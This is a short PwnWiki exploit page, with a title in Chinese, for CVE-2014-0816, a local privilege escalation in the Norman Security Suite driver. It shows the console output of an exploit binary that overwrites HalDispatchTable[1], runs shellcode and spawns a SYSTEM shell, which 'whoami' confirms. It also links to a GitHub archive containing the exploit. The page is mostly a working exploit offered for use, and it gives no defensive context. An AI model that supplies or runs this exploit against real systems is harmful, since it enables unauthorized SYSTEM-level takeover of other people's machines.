CVE-2014-0816 Norman Security Suite本地權限提升漏洞

From PwnWiki

Usage

C:\Users\user\Desktop> exploit_ngs.exe
[*] Exploit Norman General Security Driver (ngs.sys / ngs64.sys)
[*] Target file version: ver 5.0.740.0.
[*] An address file was created at C:\Users\user\Desktop\address.bin.
[*] Shellcode is located at 000000013F9357D0.
[*] The device was opened as 0000000000000044.
[*] The address file was opened as FFFFFFFF80000558.
[+] HalDispatchTable[1] is located at FFFFF800033FDC68.
[+] HalDispatchTable[1] was altered.
[+] Shellcode was executed.
[+] The SYSTEM shell was launched.
[*] Press any key to finish this program.



Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\user\Desktop>whoami
nt authority\system

EXP

https://github.com/JustYoomoon/Exploit/blob/main/CVE-2014-0816.zip


Demo win7 x64.png

Retrieved from "https://pwnwiki.com/index.php?title=CVE-2014-0816_Norman_Security_Suite本地權限提升漏洞&oldid=1068"